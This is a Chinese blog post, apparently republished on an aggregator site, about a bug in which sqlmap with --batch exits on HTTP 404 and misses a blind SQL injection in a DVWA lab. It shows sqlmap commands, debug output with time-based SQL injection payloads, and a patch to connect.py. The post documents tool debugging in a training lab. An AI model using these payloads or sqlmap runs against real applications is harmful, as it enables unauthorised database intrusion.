About

sqlmap對頁面遇到404響應碼后直接拋出一個異常并退出sqlmap不再進行后續(xù)的paylaod測試,在用sqlmap測試sql注入點的時候,一

般用到--batch參數(shù)來節(jié)省時間,這種情況下sqlmap有一處對http狀態(tài)碼404的處理不當導致無法測出注入點的bug

Detail

在爬蟲時get請求的url可輕易爬到,但是post請求的url及post的數(shù)據(jù)的取得需要探測html中有沒有表單相關的關鍵字,并通過表單

來構造post參數(shù)的值并提交來獲取后續(xù)返回內(nèi)容,如下例中詳情:

安裝dvwa設置level=low,測試SQL Injection(Blind)這一項時,參數(shù)是通過表單來提交的,點擊submit提交后會將輸入框User

ID中的內(nèi)容以get請求發(fā)送到服務器,例如在文本框中輸入1則瀏覽器將對應訪問http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#

嘗試用sqlmap跑出這個注入點,語句如下:

sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low'

這樣是可以跑出來的,但是要提高效率用工具自動發(fā)現(xiàn)這個漏洞時,一般這樣用sqlmap:

sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms --batch -v 3 --cookie='...'

由于這里的id參數(shù)的值通過爬蟲無法獲得,因為這個id參數(shù)的值是通過表單提交的,爬蟲最多可得到的url為:

http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#

上圖中的Submit按鈕對應的應該是js處理的動作,js將表單通過get請求發(fā)送到服務器,這種情況下,需要用selenium+phantomjs

來獲得上面的url(或者使用sqlmap中的--forms參數(shù)來捕獲這樣的表單),而就算得到了url,由于這個url中的id=,也即id值為空,

這種情況下,sqlmap的--batch參數(shù)的處理是隨機賦值給id并測試各種payload(eg,id=1389),然而dvwa中的這個頁面在服務器上的

處理并不一般,如果用戶提交的id參數(shù)在服務器上沒有查詢到,服務器會響應404狀態(tài)碼(可能一般waf也會這樣做),而sqlmap遇到

404狀態(tài)碼,直接就拋出異常并退出了,這樣導致無法用sqlmap的--batch參數(shù)測出這個sql注入點

其實如果用selenium+phantomjs得到了urlhttp://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#后

如果服務器正常響應查詢(這里的dvwa不正常響應,對查不到的統(tǒng)一返回404狀態(tài)碼),用sqlmap是可以檢測到這種不帶具體值的參數(shù)

類型url的注入點的,但是要設置--risk=3,默認的sqlmap的risk值為1,為1時sqlmap不會測試' or [sqli] and '1'='1(要測出

不帶參數(shù)值的參數(shù)的注入點則要通過or來測試),也即要發(fā)揮sqlmap的功能最好設置--batch --risk=3 --forms.試試直接用這種

方法測試上面的注入點(在dvwa中對應的頁面為http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/):

/tmp/sqlmap [master] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch

___

__H__

___ ___[']_____ ___ ___ {1.1.8.6#dev}

|_ -| . [(] | .'| . |

|___|_ ["]_|_|_|__,| _|

|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:40:30

[14:40:30] [DEBUG] cleaning up configuration parameters

[14:40:30] [DEBUG] setting the HTTP timeout

[14:40:30] [DEBUG] setting the HTTP Cookie header

[14:40:30] [DEBUG] creating HTTP requests opener object

[14:40:30] [DEBUG] resolving hostname '192.168.8.190'

[14:40:30] [INFO] testing connection to the target URL

[14:40:30] [DEBUG] declared web page charset 'utf-8'

[14:40:30] [INFO] searching for forms

[14:40:30] [DEBUG] initializing the knowledge base

[#1] form:

GET http://192.168.8.190:80/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit

Cookie: PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low

do you want to test this form? [Y/n/q]

> Y

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

Edit GET data [default: id=&Submit=Submit]: id=&Submit=Submit

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

do you want to fill blank fields with random values? [Y/n] Y

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

[14:40:30] [INFO] resuming back-end DBMS 'mysql'

[14:40:30] [INFO] using '/var/root/.sqlmap/output/results-08202017_0240pm.csv' as the CSV results file in multiple targets mode

[14:40:30] [DEBUG] resolving hostname '192.168.8.190'

[14:40:30] [DEBUG] declared web page charset 'utf-8'

[14:40:30] [CRITICAL] page not found (404)

[14:40:30] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 1 times

[14:40:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/var/root/.sqlmap/output/results-08202017_0240pm.csv'

[*] shutting down at 14:40:30

發(fā)現(xiàn)sqlmap跑不出來,嘗試修改sqlmap代碼,結果中有關鍵字page not found (404),于是定位相關代碼:

cd /tmp/sqlmap && grep -r "page not found" .

結果如下:

./lib/request/connect.py: errMsg = "page not found (%d)" % code

./lib/request/connect.py: debugMsg = "page not found (%d)" % code

./lib/utils/crawler.py: if "page not found" in getSafeExString(ex):

于是修改./lib/request/connect.py中代碼:

elif ex.code == httplib.NOT_FOUND:

if raise404:

errMsg = "page not found (%d)" % code

raise SqlmapConnectionException(errMsg)

else:

debugMsg = "page not found (%d)" % code

singleTimeLogMessage(debugMsg, logging.DEBUG)

將其中的raise SqlmapConnectionException(errMsg)注釋掉后再重新用剛才的sqlmap語句測試可測出這個注入點,詳情如下:

/tmp/sqlmap [master●] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch

[14:48:41] [DEBUG] checking for filtered characters

[14:48:41] [PAYLOAD] OOFt' OR 6597=IF((3988>3987),SLEEP(5),6597) AND 'sIjt'='sIjt

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

[14:49:06] [DEBUG] used the default behaviour, running in batch mode

sqlmap identified the following injection point(s) with a total of 146 HTTP(s) requests:

---

Parameter: id (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 OR time-based blind

Payload: id=OOFt' OR SLEEP(5) AND 'CaKs'='CaKs&Submit=Submit

Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

---

do you want to exploit this SQL injection? [Y/n] Y

[14:49:06] [DEBUG] used the default behaviour, running in batch mode

[14:49:06] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian

web application technology: Apache 2.4.25

back-end DBMS: MySQL >= 5.0.12

[14:49:06] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 131 times

[14:49:06] [INFO] you can find results of scanning in multiple targets mode inside the CSV file

'/var/root/.sqlmap/output/results-08202017_0246pm.csv'

[*] shutting down at 14:49:06

已提交pull request到sqlmap,相關代碼文件為lib/request/connect.py,follow

總結

以上是生活随笔為你收集整理的selenium 状态码521_sqlmap对状态码404处理的bug的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。